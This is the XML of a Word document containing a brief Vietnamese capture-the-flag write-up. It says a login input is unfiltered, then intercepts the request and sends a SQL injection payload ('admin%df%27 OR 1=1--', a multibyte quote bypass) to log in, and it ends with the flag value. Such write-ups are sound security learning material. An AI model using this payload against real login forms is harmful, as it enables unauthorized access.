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98D9B" w14:textId="68D60ADC" w:rsidR="001A22A3" w:rsidRDefault="001A22A3" w:rsidP="00BB2DBF">
      <w:r>
        <w:t>Đầu tiên vào trang ta thấy input không có lọc đầu vào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D282E4" w14:textId="581AD711" w:rsidR="00BB2DBF" w:rsidRDefault="00BB2DBF" w:rsidP="00BB2DBF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C574190" wp14:editId="2A7AFBB8">
            <wp:extent cx="5276850" cy="3250917"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="69472912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2912" name="Picture 1" descr="Graphical user interface, application, Word&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId4"/>
                    <a:srcRect t="8676" r="76739" b="65849"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5284772" cy="3255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5B391" w14:textId="04520D36" w:rsidR="001A22A3" w:rsidRDefault="001A22A3" w:rsidP="00BB2DBF">
      <w:r>
        <w:t>Thực hiện bắt gói tin và truyền payload như sau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF444D0" w14:textId="77777777" w:rsidR="00BB2DBF" w:rsidRDefault="00BB2DBF" w:rsidP="00BB2DBF">
      <w:r w:rsidRPr="0008723E">
        <w:t>login=admin%df%27%20OR%201=1--%20Unk9vvN&amp;password=password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F00AD30" w14:textId="77777777" w:rsidR="00BB2DBF" w:rsidRDefault="00BB2DBF" w:rsidP="00BB2DBF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B17837B" wp14:editId="601BE404">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="822055328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55328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1E96" w14:textId="1900F300" w:rsidR="00526962" w:rsidRDefault="00526962" w:rsidP="00BB2DBF">
      <w:r>
        <w:t>Ta có được flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1800EB2C" w14:textId="77777777" w:rsidR="00BB2DBF" w:rsidRDefault="00BB2DBF" w:rsidP="00BB2DBF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29076198" wp14:editId="75A3C599">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="859942764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42764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BD90" w14:textId="77777777" w:rsidR="00BB2DBF" w:rsidRPr="0008723E" w:rsidRDefault="00BB2DBF" w:rsidP="00BB2DBF">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008723E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>iMDaFlag1337!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3821BC01" w14:textId="77777777" w:rsidR="00D523DC" w:rsidRDefault="00D523DC"/>
    <w:sectPr w:rsidR="00D52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M Neo Sans Intel">
    <w:altName w:val="Cambria"/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89A"/>
    <w:rsid w:val="001A22A3"/>
    <w:rsid w:val="0036189A"/>
    <w:rsid w:val="00526962"/>
    <w:rsid w:val="00BB2DBF"/>
    <w:rsid w:val="00D5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5521"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{26D27F2C-14BE-4953-8E47-74932193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DBF"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="UTM Neo Sans Intel" w:eastAsia="Times New Roman" w:hAnsi="UTM Neo Sans Intel" w:cs="Times New Roman"/>
      <w:color w:val="212120"/>
      <w:kern w:val="28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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-07T16:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-07T16:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>